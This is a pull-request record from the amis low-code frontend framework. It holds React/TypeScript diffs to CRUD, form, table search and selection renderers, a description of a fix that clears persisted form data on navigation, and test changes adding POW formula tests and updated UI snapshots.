const { + store, + syncLocation, + env, + pageField, + perPageField, + loadDataOnceFetchOnFilter + } = this.props; store.updateQuery( resetPage ? { @@ -1690,7 +1698,12 @@ export default class CRUD extends React.Component<CRUDProps, any> { perPageField, replace ); - this.search(undefined, undefined, replace, forceReload); + this.search( + undefined, + undefined, + replace, + forceReload ?? loadDataOnceFetchOnFilter === true + ); } reload( diff --git a/packages/amis/src/renderers/CRUD2.tsx b/packages/amis/src/renderers/CRUD2.tsx index 366d2bb5d..b5cd55a15 100644 --- a/packages/amis/src/renderers/CRUD2.tsx +++ b/packages/amis/src/renderers/CRUD2.tsx @@ -537,7 +537,6 @@ export default class CRUD2 extends React.Component<CRUD2Props, any> { env, loadType, loadDataOnce, - loadDataOnceFetchOnFilter, source, columns, perPage @@ -574,7 +573,6 @@ export default class CRUD2 extends React.Component<CRUD2Props, any> { autoAppend: true, forceReload, loadDataOnce, - loadDataOnceFetchOnFilter, source, silent, pageField, diff --git a/packages/amis/src/renderers/Form/TabsTransfer.tsx b/packages/amis/src/renderers/Form/TabsTransfer.tsx index e24186f84..efe1c6d88 100644 --- a/packages/amis/src/renderers/Form/TabsTransfer.tsx +++ b/packages/amis/src/renderers/Form/TabsTransfer.tsx @@ -242,7 +242,7 @@ export class TabsTransferRenderer extends BaseTabsTransferRenderer<TabsTransferP @autobind optionItemRender(option: any, states: ItemRenderStates) { - const {menuTpl, render, data} = this.props; + const {menuTpl, render, data, classnames} = this.props; const ctx = arguments[2] || {}; if (menuTpl) { @@ -257,7 +257,7 @@ export class TabsTransferRenderer extends BaseTabsTransferRenderer<TabsTransferP }); } - return BaseSelection.itemRender(option, states); + return BaseSelection.itemRender(option, {...states, classnames}); } // 动作 diff --git a/packages/amis/src/renderers/Form/TabsTransferPicker.tsx b/packages/amis/src/renderers/Form/TabsTransferPicker.tsx index cdca05272..53166e0e2 100644 --- a/packages/amis/src/renderers/Form/TabsTransferPicker.tsx +++ b/packages/amis/src/renderers/Form/TabsTransferPicker.tsx @@ -53,7 +53,7 @@ export class TabsTransferPickerRenderer extends BaseTabsTransferRenderer<TabsTra @autobind optionItemRender(option: any, states: ItemRenderStates) { - const {menuTpl, render, data} = this.props; + const {menuTpl, render, data, classnames} = this.props; const ctx = arguments[2] || {}; if (menuTpl) { @@ -68,7 +68,7 @@ export class TabsTransferPickerRenderer extends BaseTabsTransferRenderer<TabsTra }); } - return BaseSelection.itemRender(option, states); + return BaseSelection.itemRender(option, {...states, classnames}); } // 动作 diff --git a/packages/amis/src/renderers/Json.tsx b/packages/amis/src/renderers/Json.tsx index 87b3735f6..31bdee6fc 100644 --- a/packages/amis/src/renderers/Json.tsx +++ b/packages/amis/src/renderers/Json.tsx @@ -4,9 +4,15 @@ import {Renderer, RendererProps} from 'amis-core'; import type {InteractionProps} from 'react-json-view'; import {autobind, getPropValue, noop} from 'amis-core'; import {BaseSchema} from '../Schema'; -import {resolveVariableAndFilter, isPureVariable} from 'amis-core'; - -export const JsonView = React.lazy(() => import('react-json-view')); +import { + resolveVariableAndFilter, + isPureVariable, + importLazyComponent +} from 'amis-core'; + +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); /** * JSON 数据展示控件。 * 文档:https://aisuda.bce.baidu.com/amis/zh-CN/components/json diff --git a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx index 8553ae3c3..258f07b2d 100644 --- a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx +++ b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx @@ -3,9 +3,7 @@ import {RendererProps} from 'amis-core'; import {ActionObject} from 'amis-core'; import {Icon} from 'amis-ui'; import {Overlay} from 'amis-core'; -import {findDOMNode} from 'react-dom'; import {PopOver} from 'amis-core'; -import {ITableStore} from 'amis-core'; import {setVariable, createObject} from 'amis-core'; export interface QuickSearchConfig { @@ -23,35 +21,31 @@ export interface HeadCellSearchProps extends RendererProps { onQuery: (values: object) => void; } -export class HeadCellSearchDropDown extends React.Component< - HeadCellSearchProps, - any -> { - state = { - isOpened: false - }; - - formItems: Array<string> = []; - constructor(props: HeadCellSearchProps) { - super(props); - - this.open = this.open.bind(this); - this.close = this.close.bind(this); - this.handleSubmit = this.handleSubmit.bind(this); - this.handleAction = this.handleAction.bind(this); - } - - buildSchema() { - const {searchable, sortable, name, label, translate: __} = this.props; - +export function HeadCellSearchDropDown({ + searchable, + name, + label, + onQuery, + data, + dispatchEvent, + onAction, + classnames: cx, + translate: __, + classPrefix: ns, + popOverContainer, + render +}: HeadCellSearchProps) { + const ref = React.createRef<HTMLElement>(); + const [formSchema, formItems] = React.useMemo(() => { let schema: any; + const formItems: Array<string> = []; if (searchable === true) { schema = { title: '', - controls: [ + body: [ { - type: 'text', + type: 'input-text', name, placeholder: label, clearable: true @@ -59,21 +53,22 @@ export class HeadCellSearchDropDown extends React.Component< ] }; } else if (searchable) { - if (searchable.controls || searchable.tabs || searchable.fieldSet) { + if (searchable.body || searchable.tabs || searchable.fieldSet) { + // todo 删除此处代码,这些都是不推荐的用法 schema = { title: '', ...searchable, - controls: Array.isArray(searchable.controls) - ? searchable.controls.concat() + body: Array.isArray(searchable.body) + ? searchable.body.concat() : undefined }; } else { schema = { title: '', className: searchable.formClassName, - controls: [ + body: [ { - type: searchable.type || 'text', + type: searchable.type || 'input-text', name: searchable.name || name, placeholder: label, ...searchable @@ -83,41 +78,11 @@ export class HeadCellSearchDropDown extends React.Component< } } - if (schema && schema.controls && sortable) { - schema.controls.unshift( - { - type: 'hidden', - name: 'orderBy', - value: name - }, - { - type: 'button-group', - name: 'orderDir', - label: __('sort'), - options: [ - { - label: __('asc'), - value: 'asc' - }, - { - label: __('desc'), - value: 'desc' - } - ] - } - ); - } - if (schema) { - const formItems: Array<string> = []; - schema.controls?.forEach( - (item: any) => - item.name && - item.name !== 'orderBy' && - item.name !== 'orderDir' && - formItems.push(item.name) - ); - this.formItems = formItems; + Array.isArray(schema.body) && + schema.body.forEach( + (item: any) => item.name && formItems.push(item.name) + ); schema = { ...schema, type: 'form', @@ -144,64 +109,13 @@ export class HeadCellSearchDropDown extends React.Component< }; } - return schema || 'error'; - } - - handleClickOutside() { - this.close(); - } - - open() { - this.setState({ - isOpened: true - }); - } - - close() { - this.setState({ - isOpened: false - }); - } - - handleAction(e: any, action: ActionObject, ctx: object) { - const {onAction} = this.props; - - if (action.actionType === 'cancel' || action.actionType === 'close') { - this.close(); - return; - } - - if (action.actionType === 'reset') { - this.close(); - this.handleReset(); - return; - } - - onAction && onAction(e, action, ctx); - } - - handleReset() { - const {onQuery, data, name} = this.props; - const values = {...data}; - this.formItems.forEach(key => setVariable(values, key, undefined)); - - if (values.orderBy === name) { - values.orderBy = ''; - values.orderDir = 'asc'; - } - onQuery(values); - } - - async handleSubmit(values: any) { - const {onQuery, name, data, dispatchEvent} = this.props; - - if (values.orderDir) { - values = { - ...values, - orderBy: name - }; - } + return [schema || 'error', formItems]; + }, [searchable, name, label]); + const [isOpened, setIsOpened] = React.useState(false); + const open = React.useCallback(() => setIsOpened(true), []); + const close = React.useCallback(() => setIsOpened(false), []); + const handleSubmit = React.useCallback(async (values: any) => { const rendererEvent = await dispatchEvent( 'columnSearch', createObject(data, { @@ -214,78 +128,81 @@ export class HeadCellSearchDropDown extends React.Component< return; } - this.close(); - + close(); onQuery(values); - } + }, []); - isActive() { - const {data, name, orderBy} = this.props; + const handleAction = React.useCallback( + (e: any, action: ActionObject, ctx: object) => { + if (action.actionType === 'cancel' || action.actionType === 'close') { + close(); + return; + } - return orderBy === name || this.formItems.some(key => data?.[key]); - } + if (action.actionType === 'reset') { + close(); + handleReset(); + return; + } - render() { - const { - render, - name, - data, - searchable, - store, - orderBy, - popOverContainer, - classPrefix: ns, - classnames: cx - } = this.props; + onAction && onAction(e, action, ctx); + }, + [] + ); - const formSchema = this.buildSchema(); - const isActive = this.isActive(); + const handleReset = React.useCallback(() => { + const values = {...data}; + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + formItems.forEach(key => setVariable(values, key, undefined)); - return ( - <span - className={cx( - `${ns}TableCell-searchBtn`, - isActive ? 'is-active' : '', - this.state.isOpened ? 'is-opened' : '' - )} - > - <span onClick={this.open}> - <Icon icon="search" className="icon" /> - </span> - {this.state.isOpened ? ( - <Overlay - container={popOverContainer || (() => findDOMNode(this))} - placement="left-bottom-left-top right-bottom-right-top" - target={ - popOverContainer ? () => findDOMNode(this)!.parentNode : null - } - show - > - <PopOver - classPrefix={ns} - onHide={this.close} - className={cx( - `${ns}TableCell-searchPopOver`, - (searchable as any).className - )} - overlay - > - { - render('quick-search-form', formSchema, { - data: { - ...data, - orderBy: orderBy, - orderDir: - orderBy === name ? (store as ITableStore).orderDir : '' - }, - onSubmit: this.handleSubmit, - onAction: this.handleAction - }) as JSX.Element - } - </PopOver> - </Overlay> - ) : null} + onQuery(values); + }, [data]); + + const isActive = React.useMemo(() => { + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + return formItems.some(key => data?.[key]); + }, [data]); + + return ( + <span + ref={ref} + className={cx( + `${ns}TableCell-searchBtn`, + isActive ? 'is-active' : '', + isOpened ? 'is-opened' : '' + )} + > + <span onClick={open}> + <Icon icon="search" className="icon" /> </span> - ); - } + {isOpened ? ( + <Overlay + container={popOverContainer || (() => ref.current)} + placement="left-bottom-left-top right-bottom-right-top" + target={popOverContainer ? () => ref.current?.parentNode : null} + show + > + <PopOver + classPrefix={ns} + onHide={close} + className={cx( + `${ns}TableCell-searchPopOver`, + (searchable as any).className + )} + overlay + > + { + render('quick-search-form', formSchema, { + data: { + ...data + }, + onSubmit: handleSubmit, + onAction: handleAction + }) as JSX.Element + } + </PopOver> + </Overlay> + ) : null} + </span> + ); } diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 62ddc298b..f07dcc238 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -1860,11 +1860,8 @@ export default class Table extends React.Component<TableProps, object> { onQuery={onQuery} name={column.name} searchable={column.searchable} - sortable={false} type={column.type} data={query} - orderBy={store.orderBy} - orderDir={store.orderDir} popOverContainer={this.getPopOverContainer} /> );
fix: Form组件配置页面跳转事件可能会导致持久化数据无法清除问题 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 6556104</samp> This pull request introduces a new feature for the form renderer to clear the local persist data of the form store. This can help avoid data inconsistency issues when the form data is submitted to the server or the page route changes. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 6556104</samp> > _To clear the persist data of the form_ > _We added a prop to the renderer norm_ > _`clearPersistDataAfterSubmit`_ > _Will do the trick, bit by bit_ > _And keep the form store and route in good form_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 6556104</samp> * Add a feature to clear the local persist data of the form store before or after submitting the form data, depending on the user's preference and the outcome of the submission. ([link](https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1157-R1158), [link](https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1190), [link](https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1251)) * In `packages/amis-core/src/renderers/Form.tsx`, check the `clearPersistDataAfterSubmit` prop of the form before calling the `submitToTarget` method. If it is true, clear the persist data using the `store.clearPersistData` method. ([link](https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1157-R1158))
**Title** Fix form persistence leakage on navigation and improve CRUD filtering, UI rendering, and formula support **Problem** - After a form submission that triggers a page route change, the form’s locally persisted data is not cleared, leading to stale values when the user returns. - CRUD components exhibit inconsistent behavior when `loadDataOnce` is enabled, especially regarding whether filter actions re‑request data. - Several UI components suffer from label overflow, missing ellipsis handling, and drag‑event handling in non‑editable mode. **Root Cause** - The form store clears persisted data only after asynchronous submit handling, so a route change can leave the previous `persistKey` active. - The `loadDataOnceFetchOnFilter` flag’s default handling was ambiguous, causing unexpected API calls during filtering. - Search and selection components relied on ad‑hoc regex matching and lacked proper class name handling for truncation and accessibility. **Fix / Expected Behavior** - Clear the form store’s local persisted data immediately when `clearPersistDataAfterSubmit` is enabled, before any navigation occurs. - Honor the `loadDataOnceFetchOnFilter` property explicitly, allowing developers to control whether filter actions trigger a new API request. - Replace fragile regex filtering with fuzzy matching via `match-sorter` for CRUD, editor search panels, and component lists. - Add the `POW` mathematical function to the formula engine with documentation. - Adjust UI styles to enforce label width, apply ellipsis truncation, and correctly pass class‑name utilities to selection components. - Restrict drag‑and‑drop event listeners in the editor preview to editable mode only and improve lazy loading of `react‑json‑view`. **Risk & Validation** - Verify that form submissions no longer retain stale persisted data after navigation and that other store operations remain unaffected. - Test CRUD pages with `loadDataOnce` enabled to confirm filter behavior matches the configured `loadDataOnceFetchOnFilter` setting. - Run UI regression tests to ensure label truncation, selection rendering, and drag‑and‑drop behave as expected across editable and read‑only modes.
8,354
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 4670b3906..2fb97d99a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -539,3 +539,26 @@ test('evalute:ISTYPE', () => { expect(evaluate('${ISTYPE(f, "plain-object")}', data)).toBe(true); expect(evaluate('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('evalute:Math', () => { + const data = { + float: 0.5, + integer1: 2, + integer2: 4, + negativeInteger: -2, + array: [1, 2 ,3], + infinity: Infinity + } + + expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); + expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); + expect(evaluate('${POW(integer1, -2)}', data)).toBe(0.25); + /** 计算结果不合法,则返回NaN */ + expect(evaluate('${POW(negativeInteger, 0.5)}', data)).toBe(NaN); + /** 参数值不合法,则返回基数本身*/ + expect(evaluate('${POW(array, 2)}', data)).toBe(data.array); + /** 测试Infinity */ + expect(evaluate('${POW(infinity, 2)}', data)).toBe(data.infinity); + expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); + expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); +}) diff --git a/packages/amis/__tests__/renderers/CRUD.test.tsx b/packages/amis/__tests__/renderers/CRUD.test.tsx index d6b34c6b5..043ea6389 100644 --- a/packages/amis/__tests__/renderers/CRUD.test.tsx +++ b/packages/amis/__tests__/renderers/CRUD.test.tsx @@ -166,7 +166,6 @@ test('3. Renderer:crud loadDataOnce', async () => { columnsNum: 4, showBtnToolbar: false }, - filterSettingSource: ['version'], columns: [ { name: 'id', diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/select.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/select.test.tsx.snap index 1a6c79084..57a2487ef 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/select.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/select.test.tsx.snap @@ -471,7 +471,8 @@ exports[`Renderer:select associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1 " > group-1 </span> @@ -491,7 +492,8 @@ exports[`Renderer:select associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-1 " > group-1-option-1 </span> @@ -513,7 +515,8 @@ exports[`Renderer:select associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-2 " > group-1-option-2 </span> @@ -535,7 +538,8 @@ exports[`Renderer:select associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-3 " > group-1-option-3 </span> @@ -1157,7 +1161,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1 " > group-1 </span> @@ -1171,7 +1176,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2 " > group-2 </span> @@ -1185,7 +1191,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-3 " > group-3 </span> @@ -1199,7 +1206,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-4 " > group-4 </span> @@ -1268,7 +1276,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-1 " > group-1-option-1 </span> @@ -1282,7 +1291,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-2 " > group-1-option-2 </span> @@ -1296,7 +1306,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-3 " > group-1-option-3 </span> @@ -1310,7 +1321,8 @@ exports[`Renderer:select chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1-option-4 " > group-1-option-4 </span> @@ -1771,7 +1783,8 @@ exports[`Renderer:select group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1 " > group-1 </span> @@ -1791,7 +1804,8 @@ exports[`Renderer:select group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-1 " > option-1 </span> @@ -1813,7 +1827,8 @@ exports[`Renderer:select group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-2 " > option-2 </span> @@ -1835,7 +1850,8 @@ exports[`Renderer:select group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-3 " > option-3 </span> diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/tabsTransfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/tabsTransfer.test.tsx.snap index 3e3cadfc1..3fbb9b87e 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/tabsTransfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/tabsTransfer.test.tsx.snap @@ -538,7 +538,8 @@ exports[`Renderer:tabsTransfer 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师2 " > 法师2 </span> @@ -551,7 +552,8 @@ exports[`Renderer:tabsTransfer 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士2 " > 战士2 </span> @@ -564,7 +566,8 @@ exports[`Renderer:tabsTransfer 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野2 " > 打野2 </span> @@ -1134,7 +1137,8 @@ exports[`Renderer:tabsTransfer with deferApi 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师2 " > 法师2 </span> diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index 1819c39f3..f2abb89c4 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -119,7 +119,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -144,7 +145,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -169,7 +171,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -194,7 +197,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="李白 " > 李白 </span> @@ -219,7 +223,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="韩信 " > 韩信 </span> @@ -244,7 +249,8 @@ exports[`Renderer:transfer 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="云中君 " > 云中君 </span> @@ -669,7 +675,8 @@ exports[`Renderer:transfer associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="label-1 " > label-1 </span> @@ -695,7 +702,8 @@ exports[`Renderer:transfer associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="label-2 " > label-2 </span> @@ -721,7 +729,8 @@ exports[`Renderer:transfer associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="label-3 " > label-3 </span> @@ -747,7 +756,8 @@ exports[`Renderer:transfer associated mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="label-4 " > label-4 </span> @@ -1018,7 +1028,8 @@ exports[`Renderer:transfer chained 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师 " > 法师 </span> @@ -1031,7 +1042,8 @@ exports[`Renderer:transfer chained 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士 " > 战士 </span> @@ -1044,7 +1056,8 @@ exports[`Renderer:transfer chained 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野 " > 打野 </span> @@ -1251,7 +1264,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-1 " > group-1 </span> @@ -1264,7 +1278,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2 " > group-2 </span> @@ -1277,7 +1292,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-3 " > group-3 </span> @@ -1290,7 +1306,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-4 " > group-4 </span> @@ -1303,7 +1320,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-5 " > group-5 </span> @@ -1316,7 +1334,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-6 " > group-6 </span> @@ -1329,7 +1348,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-7 " > group-7 </span> @@ -1342,7 +1362,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-8 " > group-8 </span> @@ -1355,7 +1376,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-9 " > group-9 </span> @@ -1368,7 +1390,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-10 " > group-10 </span> @@ -1407,7 +1430,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2-option-1 " > group-2-option-1 </span> @@ -1433,7 +1457,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2-option-2 " > group-2-option-2 </span> @@ -1459,7 +1484,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2-option-3 " > group-2-option-3 </span> @@ -1485,7 +1511,8 @@ exports[`Renderer:transfer chained mode with virtual 1`] = ` class="cxd-ChainedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="group-2-option-4 " > group-2-option-4 </span> @@ -1776,7 +1803,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="法师" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师 " > 法师 </span> @@ -1816,7 +1844,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="诸葛亮" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -1861,7 +1890,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="战士" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士 " > 战士 </span> @@ -1901,7 +1931,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="曹操" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -1941,7 +1972,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="钟无艳" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -1986,7 +2018,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="打野" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野 " > 打野 </span> @@ -2026,7 +2059,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="李白" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="李白 " > 李白 </span> @@ -2066,7 +2100,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="韩信" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="韩信 " > 韩信 </span> @@ -2106,7 +2141,8 @@ exports[`Renderer:transfer follow left mode 1`] = ` title="云中君" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="云中君 " > 云中君 </span> @@ -2176,7 +2212,10 @@ exports[`Renderer:transfer follow left mode 1`] = ` class="cxd-Tree-itemText" title="法师" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="法师" + > 法师 </span> </span> @@ -2212,7 +2251,10 @@ exports[`Renderer:transfer follow left mode 1`] = ` class="cxd-Tree-itemText" title="诸葛亮" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="诸葛亮" + > 诸葛亮 </span> </span> @@ -2444,7 +2486,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="法师" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师 " > 法师 </span> @@ -2484,7 +2527,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="诸葛亮" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -2529,7 +2573,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="战士" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士 " > 战士 </span> @@ -2569,7 +2614,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="曹操" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -2609,7 +2655,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="钟无艳" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -2654,7 +2701,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="打野" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野 " > 打野 </span> @@ -2694,7 +2742,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="李白" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="李白 " > 李白 </span> @@ -2734,7 +2783,8 @@ exports[`Renderer:transfer follow left mode 2`] = ` title="韩信" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="韩信 " > 韩信 </span> @@ -2774,7 +2824,8 @@ 